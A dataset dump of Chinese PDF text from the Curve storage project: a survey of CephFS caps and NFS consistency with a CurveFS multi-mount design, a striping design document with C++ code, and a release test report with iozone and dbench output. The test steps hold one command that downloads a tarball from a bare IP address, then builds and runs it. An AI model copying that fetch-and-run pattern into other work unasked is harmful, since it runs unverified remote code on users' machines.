O_SYNC 标记打开的文件中调用 write() 系统调用,然后意外终\n止,且只能部分应用写入操作。几乎所有文件系统(甚至本地文件系统)都有此行为。 3. 在同时发生写操作的情况下,超过对象边界的写入操作不一定是原子的。例如,写入\n器 A 写入 \"aa|aa\" 和 writer B 同时写入 \"bb |bb\", 其中 \"|\" 是对象边\n界,编写 \"aa|bb\" 而不是正确的 \"aa|aa\" 或 \"bb|bb\"。 \ncephfs使用cap实现分布式锁 \n类似的实现有 samba的oplocks以及NFS的delegation 。 \ncaps是mds授予client对文件进行操作的许可证,当一个 client想要对文件元数据进\n行变更时,比如读、写、修改权限等操作,它都必须先获取到相应的 caps才可以进行这\n些操作。 \nceph对caps的划分粒度很细,且允许多个 client在同一个 inode上持有不同的 caps。 \n根据元数据内容的不同, cephfs将caps分为了多个类别,每种类别只负责作用于某些特\n定的元数据: \n类别 功能 \nPin \n— p mds是否将inode pin 在cache中 \nAuth — \nA 权限属性相关的元数据,主要是 owner、group、mode;但如果是完成的鉴权\n是需要查看 ACL的,这部分信息保存在 xattr中,这就需要 xattr相关的cap \n \nLink — \nL inode的link count \nXattr \n— X xattr \nFile \n— F 最重要也是最复杂的一个,用于文件数据,以及和文件数据相关的 size、\natime、ctime、mtim等 \ncaps permission \n权限类型 权限说明 \nCEPH_CAP_GSHARED client can reads (s) \nCEPH_CAP_GEXCL client can read and update (x) \nCEPH_CAP_GCACHE (file) client can cache reads (c) CEPH_CAP_GRD (file) client can read (r) \nCEPH_CAP_GWR (file) client can write (w) \nCEPH_CAP_GBUFFER (file) client can buffer writes (b) \nCEPH_CAP_GWREXTEND (file) client can extend EOF (a) \nCEPH_CAP_GLAZYIO (file) client can perform lazy io (l) \ncaps combination \n一个完整的 cap通过[类别+permission] 组成,client可以同时申请多个类别的 caps。\n但并不是每种 caps都可以使用每种 permission ,有些caps只能搭配部分 permission 。\n有关caps种类和permission 的结合使用,有一些几个规则: \n类型 说明 \nPin 二值型,有 pin就代表client知道这个 inode存在,这样 mds就一定会在\n其cache中保存这个 inode。 \nAuth、\nLink、\nXattr 只能为shared或者exclusive \n▪ shared: client 可以将对应元数据保存在本地并缓存和使用 \n▪ exclusive: client 不仅可以在本地缓存使用,还可以修改 \n下面是两个例子: \n▪ [A]s:某client对inode 0x11 有As的cap,此时收到一个查看\n0x11状态的系统调用,那么 client不需要再向 mds请求,直接通过\n查询自身缓存并进行处理和回复 \n▪ [A]x:某client对inode 0x11 有Ax的cap,此时收到一个修改\nmode的系统调用, client可以直接在本地进行修改并回复,并且在\n之后才将修改变更通知 mds File 最复杂的一种,下面是 File cap 的各个类别: \nfile cap 种类client权限 \nFs: client 可以将mtime和size在本地cache并读取使用 \nFx: client 可以将mtime和size在本地cache并进行修改和读取 \nFr: client 可以同步地从 osd读取数据,但不能 cache \nFc: client 可以将文件数据 cache在本地内存,并直接从 cache中读 \nFw: client 可以同步地写数据到 osd中,但是不能 buffer \nFb: client 可以buffer write ,先将写的数据维护在自己的内存中,在统\n一flush到后端落盘 \ncaps管理 \nlock \ncaps由mds进行管理,其将元数据划分为多个部分,每个部分都有专门的锁\n(SompleLock ,ScatterLock 、FileLock )来保护, mds通过这些锁的状态来确定 caps可\n以怎么样分配。 \nmds内部维护了每个锁的状态机,其内容非常负责,也是 mds保证caps分配准确性和数\n据一致性的关键。 \ncaps如何变更 \n▪ mds可以针对每个 client进行授予和移出 caps,通常是由其他 client的行为触发 \n▪ 例:比如 client1已经拥有了 inode 0x11 的cache read 的cap,此时\nclient2要对这个文件进行写,那显然除了授予 client2响应的写 caps的\n同时,还要剥夺 client1的cache read cap \n▪ 当client被移出caps时,其必须停止使用该 cap,并给mds回应确认消息。 mds\n需要等待收到 client的确认消息后才会 revoke。(如果 client挂掉或者处于某\n种原因没有回复 ack怎么办?) \n▪ client停止使用并不简单,在不同场景下需要完全不同的处理: \n▪ 例1:client被移出cache read cap ,直接把该 file的cache删掉,并变\n更状态就行,这样下次的 read请求过来时,还是到 osd去读 ▪ 例2:client被移出buffer write cap ,已经缓存了大量的数据还没有\nflush,那就需要先 flush到osd,再变更状态和确认,这可能就需要较长\n的时间 \n下面是一个修改权限的例子: 总结: \n总结: \n1. mds需要记住所有 client pin 的inode \n2. mds的cache需要比client的cache更多 \n3. caps是由mds和client共同协作维护的,所以 client需要正常运行,否则可能\n会block其他client \nfuse write 实例 \n以fuse client write 为例,简要分析下 fuse write( 主要流程 )时caps的代码逻辑: \nint64_t Client::_write(Fh *f, int64_t offset, uint64_t size, const char *buf, \n const struct iovec *iov, int iovcnt) \n{ \n want = CEPH_CAP_FILE_BUFFER; \n // 需要拥有 file write 和auth shared caps 才(即FwAs)能够写, get_caps 中如果检\n查没有caps则会 \n // 去向mds申请并等待返回 \n int r = get_caps(in, CEPH_CAP_FILE_WR|CEPH_CAP_AUTH_SHARED, want, &have, \nendoff); \n if (r < 0) \n return r; \n \n // 增加该inode对该caps的引用计数并检查该 caps是否正在使用中 \n put_cap_ref(in, CEPH_CAP_A UTH_SHARED); \n \n // 如果有buffer 或者lazy io cap 则直接在 objectcacher cache 中写 \n if (cct->_conf->client_oc && \n (have & (CEPH_CAP_FILE_BUFFER | CEPH_CAP_FILE_LAZYIO))) { \n // 缓存写的调用,异步、 cache、非阻塞 \n r = objectcacher ->file_write(&in ->oset, &in ->layout, \n in->snaprealm ->get_snap_context(), \n offset, size, bl, ceph::real_clock::now(), \n 0); \n } else { \n // 如果没有 buffer cap ,则直接通过 osd写 \n if (f->flags & O_DIRECT) \n _flush_range(in, offset, size); \n \n // 同步写的调用 \n filer->write_trunc(in ->ino, &in ->layout, \nin->snaprealm ->get_snap_context(), offset, size, bl, ceph::real_clock::now(), 0, \n in->truncate_size, in ->truncate_seq, \n &onfinish); \n } \n} \n总结 \ncephfs不需要用户做指定,对文件访问时都需要获取相应的权限。 \nposix 是否支持 \nopen with O_APPEND 不支持 \nflock/fcntl 内核版本支持, fuse客户端不确定 \nNFS \n简介 \n在存储系统中, NFS(Network File System, 即网络文件系统 ) 是一个重要的概念,已成\n为兼容Posix语义分布式文件系统的基础。它允许在多个主机之间共享公共文件系统,并\n提供数据共享的优势,从而最小化所需的存储空间。 \nNFS作为类UNIX系统的标准网络文件系统,在发展过程中逐步原生地支持了文件锁 (从\nNFSv4开始)。NFS从上个世界 80年代诞生至今,共发布了 3个版本: NFSv2、NFSv3、\nNFSv4。NFSv4最大的变化是有“状态”了。某些操作需要服务端维持相关状态,如文件\n锁,例如客户端申请了文件锁,服务端就需要维护该文件锁的状态,否则其他客户端冲突\n的访问就无法检测。 \n数据和元数据缓存一致性 \nNFS客户端是弱缓存一致性,用于满足绝大多数文件共享场景。 \n▪ Close-to-open 缓存一致性( weak cache consistency ,CTO)。通常文件共\n享是完全顺序的,比如: clienA进行了open,write,close;clientB 进行\nopen,然后可以读到 clientA的写入数据。 NFS client 在文件open的时候向\nserver发送请求查询 open权限;NFS client 在文件close的时候将本地文件的\n变更写入到 server以便再次打开可以读取。在 mount的时候可以通过 nocto 选\n项关闭。 \n▪ 弱缓存一致性( weak cache consistency ,WCC)。client的data cache 中的数\n据不总是最新的。当客户端有很多并发操作同时更新文件时(多客户端异步写),文件上的数据最终是什么是 不确定的。但 NFS为client端提供了接口来检\n查当前的数据是否被其他客户端修改过。 \n▪ 属性缓存( Attribute caching )。在挂载的时候加上 noac 参数保证多 client\n情况下的缓存一致性,此时 client端不能缓存文件元数据,元数据每次需要从\nserver端获取。这种方式使得客户端能及时获取到文件的更新信息,但会增加很\n多网络开销。需要注意的是, noac参数情况下, data cache 是允许的,因此,\ndata cache 的一致性是不能保证的。 如果需要强缓存一致性,应用应该使用文\n件锁。或者应用程序可以使用 O_DIRECT 方式打开文件以禁用数据缓存。 \n客户端缓存 \n当应用程序共享文件的时,无论是否在同一个 client上,应用程序都需要考虑冲突。\nNFSv4支持Share reservations 和 byte-range locks 两种实现互斥的方式。 NFSv4需要\n有data cache 以支持一些应用。 \nShare reservations 是一种控制文件访问权限的机制,独立于 byte-rage locking 。当\nclient端OPEN文件时,他需要指定访问类型( READ, WRITE, o r BOTH)以及访问权限\n(OPEN4_SHARE_DENY_NONE,OPEN4_SHARE_DENY_READ, OPEN4_SHARE_DENY_WRITE, or \nOPEN4_SHARE_DENY_BOTH )。伪代码如下: \nif (request.access == 0) \n return (NFS4ERR_INVAL) \n else if ((request.access & file_state.deny) || \n (request.deny & fi le_state.access)) \n return (NFS4ERR_DENIED) \n为了提供正确的共享语义, client必须使用 OPEN操作来获取初始文件句柄,并指出想要\n的访问以及拒绝哪些访问。 OPEN/CLOSE 还需要遵循一下规则: \n▪ client OPEN 文件时, client需要从服务器重新获取数据并判断缓存中的数据是否\n已经失效。 \n▪ client CLOSE 文件时,需要将所有的缓存数据持久化。 \n对于选择文件锁的应用,有一组类似的规则。 \n▪ 当client获得指定区域的文件锁后,这段区域 的数据缓存失效。 \n▪ 在client释放指定区域文件锁之前,客户端所有的修改必须持久化。 \n结论 \nposix 是否支持 open with \nO_APPEND 不支持 (https://man7.org/linux/man -\npages/man2/open.2.html ) \nflock/fcntl 支持。并且在文件有强一致性要求时,推荐应用使用。 \n业务场景 \n1. 对多挂载的要求是什么?支持挂载到同一个文件系统?支持同时读写同一个文件? \n2. 对一致性的要求是什么? close-to-open? 还是更严格的要求? \n业务 对文件系统的需求 \ngoblinceph 1. 大部分场景是多个节\n点写一个文件系统的\n不同文件,很少对相\n同文件进行读写。在\n对相同文件进行读写\n时,不要求文件系统\n做正确性和一致性的\n保证,如果业务有需\n求,可以调用文件锁\n保证; \n2. 一致性要求其实不是\n很强烈,正常一致性\n应该通过其他更专业\n的方案。 \neassyai 使用tensorflow 平台,所以\n和AI场景的通用痛点类似的\n。 \nAI场景 \n人工智能是数据的消耗大户,对存储有针对性的需求。 \nAI访问存储的几个特点: \n• 海量文件 ,训练模型的精准程度依赖于数据集的大小,样本数据集越大,就为模\n型更精确提供了基础。通常,训练任务需要的文件数量都在几亿,十几亿的量级,\n对存储的要求是能够承载几十亿甚至上百亿的文件数量。 • 小文件,很多的训练模型都是依赖于图片、音频片段、视频片段文件,这些文件\n基本上都是在几 KB到几MB之间,对于一些特征文件,甚至只有几十到几百个字\n节。 \n• 读多写少, 在大部分场景中,训练任务只读取文件,把文件读取上 来之后就开始\n计算,中间很少产生中间数据,即使产生了少量的中间数据,也是会选择写在本\n地,很少选择写回存储集群, 因此是读多写少,并且是一次写,多次读 。 \n• 目录热点, 由于训练时,业务部门的数据组织方式不可控,系统管理员不知道用\n户会怎样存储数据。很有可能用户会将大量文件存放在同一个目录,这样会导致多\n个计算节点在训练过程中,会同时读取这一批数据,这个目录所在的元数据节点就\n会成为热点。跟一些 AI公司的同事交流中,大家经常提到的一个问题就是,用户\n在某一个目录下存放了海量文件,导致训练的时候出现性能问题,其实就是碰到了\n存储的热点问题。 \n综上,对于 AI场景来说, 对多挂载没有一致性需求, 主要的挑战是: \n1. 海量文件的存储 \n2. 小文件的访问性能 \n3. 目录热点(这里有一个解决方案虚拟目录,后续我们解决这个问题的时候可以参\n考。目前 Curve使用的是静态子树 +哈希的方案) \nCurveFS 如何支持多挂载 \n本文主要调研了传统分布式文件系统: GPFS、Lustre、CephFS、NFS 和 面向云原生环境\n设计的分布式文件系统: JuiceFS 和 Chubaofs 。 \n上述分析可以得出: \n▪ GPFS、Lustre、NFS、CephFS 都支持多节点的读写同步,提供数据和元数据多个级\n别的一致性。 \n▪ JuiceFS 使用中心节点管理锁,支持多节点读写同步,保证最终一致。 \n▪ ChubaoFS 支持多节点写不同区域,保证最终一致。不保证多节点写同一区域的一\n致性。 \n对于以上四中场景, curvefs 在并发读写场景下需要支持何种一致性?如何支持?是本文\n需要得出的结论。 \n1. CurveFS 需要支持写写互斥,读写互斥? \n1. posix文件接口的语义是针对多进程情况下的读写并发行为,并没有规定多\n节点下的读写并发行为。 2. NFS给出了读写并发行为下一致性的保证: close-to-open缓存一致性、弱\n缓存一致性 (提供接口检查是否被其他客户端修改过,其他不做保证 )、属性\n缓存(挂载的时候指定 noac) \n3. 所以CurveFS 无需默认支持写写互斥、读写互斥。 CurveFS 对读写并发行为\n的规定如下: \n1. close-to-open一致性并提供开关 (cto/nocto) 。close完再打开文\n件,一定可以读到全部的最新数据。 \n2. 支持文件锁 fcntl、flock。让用户可以通过该接口实现并发读写情\n况下的强一致语义。( O_APPEND 可以不做支持,因为性能必然很\n差,实际估计不会应用。) \n3. 更多挂载选项 支持:cto/ncto (是否开启 cto,ncto可以提高只读挂\n载的性能)、 ac/noac(是否开启元数据缓存)、 local_lock (non、\nposix、flock、all 是否仅支持本地锁) \n2. 如何实现? \n1. cto一致性, cto/ncto 开关。ncto时打开文件允许缓存不更新。 \n2. flock、fcntl \n实现可以参照: LDML(参考资料:\nUnderstanding_Lustre_Filesystem_Internals )、NFS(NFS:Opens and \nByte-Range Locks )、JuiceFS(源码阅读)。 \n3. 更多挂载选项支持:可以参考 NFS。 \n参考文档 \n1. GPFS: A Shared -Disk File System for Large Computing Clusters \n2. GPFS—三大关键组件 \n3. Lustre分布式锁管理器的分析与改进 \n4. 文件系统那些事 -第4篇 并行文件系统之开源解决方案 Lustre \n5. Lustre wiki \n6. juicefs/docs/zh_cn/cache_management.md \n7. 被遗忘的桃源 ——flock 文件锁 \n8. 多进程之间的文件锁 \n9. juicefs readme \n10.多写文件系统与 DLM 设想 \n11.CEPH 文件系统限 制和 POSIX 标准 \n12.CephFS Caps \n13.CephFS caps 简介 \n14.What are “caps”? (And Why Won ’t my Client Drop Them?) - Gregory \nFarnum, Red Hat \n15.CAPABILITIES IN CEPHFS \n16.cephfs:用户态客户端 write \n17.NFS文件锁一致性设计原理解析 \n18.Network File System (NFS) Version 4 Protocol \n19.AI 场景的存储优化之路 \n20.man5nfs \n21.Lustre文件系统 I/O锁的应用与优化 \n22.Lustre & Application I/O \n \n \n \n" } ]
{ "category": "Runtime", "file_name": "curve-stripe.pdf", "project_name": "Curve", "subcategory": "Cloud Native Storage" }
[ { "data": "© XXX Page 1 of 9curve条带特性设计文档© XXX Page 2 of 9修订记录\n背景介绍\n方案设计\n条带化特性\n数据结构\n条带特性需要修改的流程\n详细流程描述\n升级相关\ncinder&&nova\nstorage&&rpc\n修订记录\n \n时间 内容 作者 Reviewer\n 2020.12.15  完成初稿  胡遥  \n2020.12.17 修复评审意见 胡遥  curve全体人员\n背景介绍\ncurve在大IO顺序写的场景下性能表现比较差,主要原因是顺序写一段时间内会集中发到某一个copyset,导致并发性不够,而某个copyset拥堵导致平均时延变高。在分析清楚愿意之后,考虑通过增加卷的条带特\n性来加大client到copyset的并发性,提高顺序写性能。\n方案设计\n条带化特性\n条带化行为主要受3个参数的控制:\nchunksize:默认文件的大小16MB\nstripe_unit:条带切分的粒度,每个stripe_unit的连续字节会被保存在同一个文件中,client写满stripe unit大小的数据后,去下一个chunk写同样的大小。\nstripe_count: 表示条带的宽度,client连续写多少个stripe_unit后,又重新写第一个文件。\n一般来说stripe_count越大,stripe_unit越小,顺序写并发被打的越散,并发度越高。\n举例说明一下client写入io的顺序,以及chunk数据的分布情况。假如chunksize为8MB,stripe_unit 2MB, 。如下图:每个编号代表了一个条带分片,即stripe_unit stripe_count 4\n2MB的大小,编号表示了io的顺序,client是先写了2MB到chunk1上,然后写2MB到chunk2上,依次循环。直到这4个chunk都写满后,开始写新的一组条带。\n注意:stripe_unit * stripe_count不一定等于chunksize,比如这里如果chunksize是16MB的话,那么chunk1还要继续追 8。 加写16,20,24,2© XXX Page 3 of 9\n数据结构\n条带涉及的主要数据结构包括:\nclient端© XXX Page 4 of 9typedef struct FInfo {\n uint64_t id;\n uint64_t parentid;\n FileType filetype;\n uint32_t chunksize;\n uint32_t segmentsize;\n uint64_t length;\n uint64_t ctime;\n uint64_t seqnum;\n // userinfo\n UserInfo_t userinfo;\n // owner\n std::string owner;\n std::string filename;\n std::string fullPathName;\n FileStatus filestatus;\n std::string cloneSource;\n uint64_t cloneLength{0};\n uint32_t stripeUnit;\n uint32_t stripeCount;\n} FInfo_t;\nmessage CreateFileRequest {\n required string fileName = 1;\n required FileType fileType = 3;\n optional uint64 fileLength = 4;\n required string owner = 2;\n optional string signature = 5;\n required uint64 date = 6;\n optional uint32 stripeUnit = 7;\n optional uint32 stripeCount = 8;\n};\nmds端© XXX Page 5 of 9message FileInfo {\n optional uint64 id = 1;\n optional string fileName = 2;\n optional uint64 parentId = 3;\n optional FileType fileType = 4;\n optional string owner = 5;\n optional uint32 chunkSize = 6;\n optional uint32 segmentSize = 7;\n optional uint64 length = 8;\n optional uint64 ctime = 9;\n optional uint64 seqNum = 10;\n optional FileStatus fileStatus = 11;\n //,\n //RecycleBin/\n optional string originalFullPathName = 12;\n // cloneSource (curvefs)\n // s3\n optional string cloneSource = 13;\n // cloneLength cloneextent\n optional uint64 cloneLength = 14;\n optional uint32 stripeUnit = 15;\n optional uint32 stripeCount = 16;\n}\n条带特性需要修改的流程\nmds端\nCreateFile流程: , fileInfo新增条带参数的set/get函数,将条带数据保存在fileinfo中。 新增条带参数的合法性检查 如果没有设置条带参数,默认不开条带功能。\nDecodeFile流程:新增的stripeUnit和stripeCount采用optional类型, 。 支持新老版本的数据结构兼容\nclient端\nCreateFile流程:新增create2接口,增加条带参数。\n读/写流程:修改统一 。 的io切分函数IO2ChunkRequests,不影响原有逻辑\n工具\ncurve:create,stat\ncurve_ops_tool:不需要改\ncurvefs_python:cbd_client:create接口;libcurvefs.h:create接口© XXX Page 6 of 9 \n详细流程描述\nCreateFile流程,如下图。红色部分为需要添加的代码逻辑。\nclient读写流程:\n \n这一块也是整个条带特性的核心修改流程,主要改动点是Splitor::IO2ChunkRequests函数。该函数主要就是通过off和len找到读写对应chunklist以及chunk内的offset和len。由于之前poc已经完成相关代码,这\n里直接上代码分析\nint Splitor::IO2ChunkRequests(IOTracker* iotracker, MetaCache* metaCache,\n std::vector* targetlist,\n butil::IOBuf* data, off_t offset, size_t length,\n MDSClient* mdsclient, const FInfo_t* fileInfo) {\n ... \n targetlist->reserve(length / (iosplitopt_.fileIOSplitMaxSizeKB * 1024) + 1); \n \n const uint64_t chunkSize = fileInfo->chunksize;\n uint64_t stripeSize = fileInfo->stripeSize;\n const uint64_t stripeCount = fileInfo->stripeCount; //stripe count by one chunk\n if (stripeCount == 1) {\n LOG(INFO) << \"stripe count is one, stripe size == chunk size\"; \n stripeSize = chunkSize;© XXX Page 7 of 9 }\n const uint64_t stripesPerChunk = chunkSize / stripeSize;\n \n uint64_t cur = offset;\n uint64_t left = length;\n uint64_t curChunkIndex = 0;\n while (left > 0) {\n uint64_t blockIndex = cur / stripeSize;\n uint64_t stripeIndex = blockIndex / stripeCount;\n uint64_t stripepos = blockIndex % stripeCount;\n uint64_t curChunkSetIndex = stripeIndex / stripesPerChunk;\n uint64_t curChunkIndex = curChunkSetIndex * stripeCount + stripepos;\n \n uint64_t blockInChunkStart = (stripeIndex % stripesPerChunk) * stripeSize;\n uint64_t blockOff = cur % stripeSize;\n uint64_t curChunkOffset = blockInChunkStart + blockOff;\n uint64_t requestLength = std::min((stripeSize - blockOff), left);\n /*LOG(INFO) << \"request split curChunkIndex = \" << curChunkIndex\n << \", curChunkOffset = \" << curChunkOffset\n << \", requestLength = \" << requestLength\n << \", cur = \" << cur\n << \", left = \" << left;*/\n if (!AssignInternal(iotracker, metaCache, targetlist, data,\n curChunkOffset, requestLength, mdsclient,\n fileInfo, curChunkIndex)) {\n LOG(ERROR) << \"request split failed\"\n << \", off = \" << curChunkOffset\n << \", len = \" << requestLength\n << \", seqnum = \" << fileInfo->seqnum\n << \", chunksize = \" << chunkSize\n << \", chunkindex = \" << curChunkIndex;\n \n return -1;\n }\n left -= requestLength;© XXX Page 8 of 9 cur += requestLength;\n } \n}\n对代码中一些变量进行解释,如下图:\nblockindex:每个stripesize大小可以认为是一个block,blockindex表示在整个文件中的block索引编号,如图红色部分的blockindex为6\nstripeIndex:如图每一行是一个stripe,stripeIndex表示是stripe的索引编号,如图红色部分的stripeIndex为1\nchunksetIndex:表示条带里包含的chunk组。如图,整个4个chunk组成一个chunkset,编号为0。\nstripepos:在chunkset中属于的chunk位置,如图,红色部分stripepos为2.\n获取了以上几个数据后,我们可以计算真正需要获取的值。\ncurChunkIndex:chunk的索引,curChunkSetIndex * stripeCount (前面所有chunkset包含的chunk数量)+ stripepos\ncurChunkOffset:在chunk中的偏移。先计算cur所在的block在当前chunk的的偏移位置即blockInChunkStart=(stripeIndex % stripesPerChunk) * stripeSize;\n在计算cur在当前block的偏移位置:blockOff = cur % stripeSize;\n最后curChunkOffset = blockInChunkStart + blockOff。\n请求的长度为该block剩余的长度和整个请求剩余长度left的最小值:requestLength = std::min((stripeSize - blockOff), left);\n \n升级相关\ncinder&&nova\n由于我们接口的改动,需要cinder那边也进行适配,并联调测试\nstorage&&rpc© XXX Page 9 of 9存储和rpc涉及到的数据结构为message CreateFileRequest和message FileInfo,因为数据结构中添加的是optional参数,在序列化和反序列化都无报错。后续测试的时候也需要增对升级进行用例设计。\n \n \n \n " } ]
{ "category": "Runtime", "file_name": "release2.4-test.pdf", "project_name": "Curve", "subcategory": "Cloud Native Storage" }
[ { "data": "© XXX Page 1 of 21curvefs 2.4.0版本总体测试© XXX Page 2 of 21 \n一、遗留问题列表\n二、测试内容和结论概述\n三、测试要点\n四、测试结论\n五、详细测试数据及监控数据\n5.1 常规测试\n5.1.1 文件系统POSIX 接口\n5.1.1.1 pjdtest\n5.1.1.2 ltp-fsstress\n测试结果:\n5.1.2 元数据项& 数据属性\n5.1.2.1 dbench\n5.1.2.2 iozone\n5.1.2.3 mdtest\n5.1.2.4 rename 测试用例集\n5.1.2.5 xfstest\n5.1.3 数据一致性测试\n5.1.3.1 编译项目或者内核\n5.1.3.2 vdbench读写一致性测试\n5.2 异常测试\n5.3 新增功能测试\n5.3.1 warmup测试\n5.3.1.1 cto open\n5.3.1.1.1 静态warmup\n5.3.1.1.2 同时有读写时warmup\n5.3.1.1.2.1 缓存盘容量不足时\n5.3.1.1.2.1.1 大文件(根据缓存盘容量)并发操作\n5.3.1.1.2.1.2 大规模目录(1000w+)\n5.3.1.1.2.2 缓存盘容量足够时\n5.3.1.1.2.2.1 大文件(根据缓存盘容量)并发操作\n5.3.1.1.2.2.2 大规模目录(1000w+)\n5.4 回归测试\n一、遗留问题列表\n问题列表 \n  风险项 ISSUE.No 负责人 严重级别 是否解决 是否需要回归 回归人 是否回归通过 应急预案 备注\n二、测试内容和结论概述\n测试节点硬件配置与软件版本\n环境信息 稳定性测试环境 9个机器© XXX Page 3 of 211. \n2. CPU Intel(R) Xeon(R) CPU E5-2680 v4 @ 2.40GHz\n内存 256G\n网卡\nIntel Corporation I350 Gigabit Network Connection\nIntel Corporation 82599EB 10-Gigabit SFI/SFP+\n操作系统 发行版:Debian GNU/Linux 9\n \n内核 4.19.87-netease6-1 #2 SMP Mon Sep 7 07:50:31\n用途 计算节点\ncurvefs版本 2.1.0\n部署方式\ns3 nos\n镜像 harbor.cloud.netease.com/curve/curvefs:citest\ndisk cache INTEL SSDSC2BB80 800G\nmetaserver数据 ssd 混合部署\nmds ssd 混合部署\netcd ssd 混合部署\ncurveadm版本 0.1.0\n三、测试要点\n1、warmup相关功能、异常、性能测试\n2、cto相关问题修复© XXX Page 4 of 213、copysets数据均衡性\n4、新版本sdk稳定性和性能\n四、测试结论\n五、详细测试数据及监控数据\n5.1 常规测试\n5.1.1 文件系统POSIX 接口\n5.1.1.1 pjdtest\n已在ci中测试。\n5.1.1.2 ltp-fsstress\n测试程序: ltp-full-20220930.tar.bz2\n测试步骤:© XXX Page 5 of 21set -ex\nmkdir -p fsstress\npushd fsstress\nwget -q -O ltp-full.tgz http://59.111.93.102:8080/qa/ltp-full.tgz // \ntar xzf ltp-full.tgz\npushd ltp-full-20091231/testcases/kernel/fs/fsstress\nmake\nBIN=$(readlink -f fsstress)\npopd\npopd\nT=$(mktemp -d -p .)\n\"$BIN\" -d \"$T\" -l 1 -n 1000 -p 10 -v\necho $?\nrm -rf -- \"$T\"\n测试结果:\nsuccess\n5.1.2 元数据项& 数据属性\n5.1.2.1 dbench\ndbench\n执行命令:\nsudo dbench -t 600 -D ltp-full-20220930 -c /usr/share/dbench/client.txt 10\n结果:© XXX Page 6 of 21Operation Count AvgLat MaxLat\n ----------------------------------------\n NTCreateX 111856 12.154 910.045\n Close 82175 9.680 413.501\n Rename 4735 422.706 2669.516\n Unlink 22549 11.286 824.908\n Qpathinfo 101390 6.440 747.853\n Qfileinfo 17699 0.019 0.108\n Qfsinfo 18549 1.130 149.004\n Sfileinfo 9053 5.291 290.058\n Find 39162 14.795 877.050\n WriteX 55122 0.076 4.072\n ReadX 175813 0.119 56.392\n LockX 366 0.005 0.019\n UnlockX 366 0.002 0.023\n Flush 7764 33.910 156.470\nThroughput 5.82144 MB/sec 10 clients 10 procs max_latency=2669.523 ms\n5.1.2.2 iozone\n测试步骤:\niozone -a -n 1g -g 4g -i 0 -i 1 -i 2 -i 3 -i 4 -i 5 -i 8 -f testdir -Rb log.xls\niozone -c -e -s 1024M -r 16K -t 1 -F testfile -i 0 -i 1\niozone -c -e -s 1024M -r 1M -t 1 -F testfile -i 0 -i 1\niozone -c -e -s 10240M -r 1M -t 1 -F testfile -i 0 -i 1\n测试结果:\niozone -a -n 1g -g 4g -i 0 -i 1 -i 2 -i 3 -i 4 -i 5 -i 8 -f testdir -Rb log.xls client © XXX Page 7 of 21\niozone -c -e -s 1024M -r 16K -t 1 -F testfile -i 0 -i 1\niozone -c -e -s 1024M -r 16K -t 1 -F testfile -i 0 -i 1 \n Iozone: Performance Test of File I/O \n Version $Revision: 3.429 $ \n Compiled for 64 bit mode. \n Build: linux-AMD64 \n \n Contributors:William Norcott, Don Capps, Isom Crawford, Kirby Collins \n Al Slater, Scott Rhine, Mike Wisner, Ken Goss \n Steve Landherr, Brad Smith, Mark Kelly, Dr. Alain CYR, \n Randy Dunlap, Mark Montague, Dan Million, Gavin Brebner,\n Jean-Marc Zucconi, Jeff Blomberg, Benny Halevy, Dave Boone,© XXX Page 8 of 21 Erik Habbinga, Kris Strecker, Walter Wong, Joshua Root,\n Fabrice Bacchella, Zhenghua Xue, Qin Li, Darren Sawyer,\n Vangel Bojaxhi, Ben England, Vikentsi Lapa.\n \n Run began: Thu Dec 1 10:18:38 2022\n \n Include close in write timing \n Include fsync in write timing\n File size set to 1048576 kB \n Record Size 16 kB \n Command line used: iozone -c -e -s 1024M -r 16K -t 1 -F testfile -i 0 -i 1\n Output is in kBytes/sec \n Time Resolution = 0.000001 seconds.\n Processor cache size set to 1024 kBytes. \n Processor cache line size set to 32 bytes.\n File stride size set to 17 * record size. \n Throughput test with 1 process \n Each process writes a 1048576 kByte file in 16 kByte records \n \n Children see throughput for 1 initial writers = 91503.61 kB/sec\n Parent sees throughput for 1 initial writers = 91501.71 kB/sec\n Min throughput per process = 91503.61 kB/sec\n Max throughput per process = 91503.61 kB/sec\n Avg throughput per process = 91503.61 kB/sec\n Min xfer = 1048576.00 kB © XXX Page 9 of 21 \n Children see throughput for 1 rewriters = 90770.86 kB/sec\n Parent sees throughput for 1 rewriters = 90768.49 kB/sec\n Min throughput per process = 90770.86 kB/sec\n Max throughput per process = 90770.86 kB/sec\n Avg throughput per process = 90770.86 kB/sec\n Min xfer = 1048576.00 kB \n \n Children see throughput for 1 readers = 167221.64 kB/sec\n Parent sees throughput for 1 readers = 167213.43 kB/sec\n Min throughput per process = 167221.64 kB/sec\n Max throughput per process = 167221.64 kB/sec\n Avg throughput per process = 167221.64 kB/sec\n Min xfer = 1048576.00 kB \n \n Children see throughput for 1 re-readers = 1047344.44 kB/sec\n Parent sees throughput for 1 re-readers = 1047067.22 kB/sec\n Min throughput per process = 1047344.44 kB/sec\n Max throughput per process = 1047344.44 kB/sec\n Avg throughput per process = 1047344.44 kB/sec\n Min xfer = 1048576.00 kB© XXX Page 10 of 21© XXX Page 11 of 21iozone test complete.\niozone -c -e -s 1024M -r 1M -t 1 -F testfile -i 0 -i 1\nInclude close in write timing\n Include fsync in write timing\n File size set to 1048576 kB\n Record Size 1024 kB\n Command line used: iozone -c -e -s 1024M -r 1M -t 1 -F testfile -i 0 -i 1\n Output is in kBytes/sec\n Time Resolution = 0.000001 seconds.\n Processor cache size set to 1024 kBytes.\n Processor cache line size set to 32 bytes.\n File stride size set to 17 * record size.\n Throughput test with 1 process\n Each process writes a 1048576 kByte file in 1024 kByte records\n Children see throughput for 1 initial writers = 96521.59 kB/sec\n Parent sees throughput for 1 initial writers = 96519.08 kB/sec© XXX Page 12 of 21 Min throughput per process = 96521.59 kB/sec\n Max throughput per process = 96521.59 kB/sec\n Avg throughput per process = 96521.59 kB/sec\n Min xfer = 1048576.00 kB\n Children see throughput for 1 rewriters = 96529.34 kB/sec\n Parent sees throughput for 1 rewriters = 96526.59 kB/sec\n Min throughput per process = 96529.34 kB/sec\n Max throughput per process = 96529.34 kB/sec\n Avg throughput per process = 96529.34 kB/sec\n Min xfer = 1048576.00 kB\n Children see throughput for 1 readers = 182745.86 kB/sec\n Parent sees throughput for 1 readers = 182734.62 kB/sec\n Min throughput per process = 182745.86 kB/sec\n Max throughput per process = 182745.86 kB/sec\n Avg throughput per process = 182745.86 kB/sec\n Min xfer = 1048576.00 kB© XXX Page 13 of 21 Children see throughput for 1 re-readers = 1692895.88 kB/sec\n Parent sees throughput for 1 re-readers = 1691925.45 kB/sec\n Min throughput per process = 1692895.88 kB/sec\n Max throughput per process = 1692895.88 kB/sec© XXX Page 14 of 21 Avg throughput per process = 1692895.88 kB/sec\n Min xfer = 1048576.00 k \niozone -c -e -s 10240M -r 1M -t 1 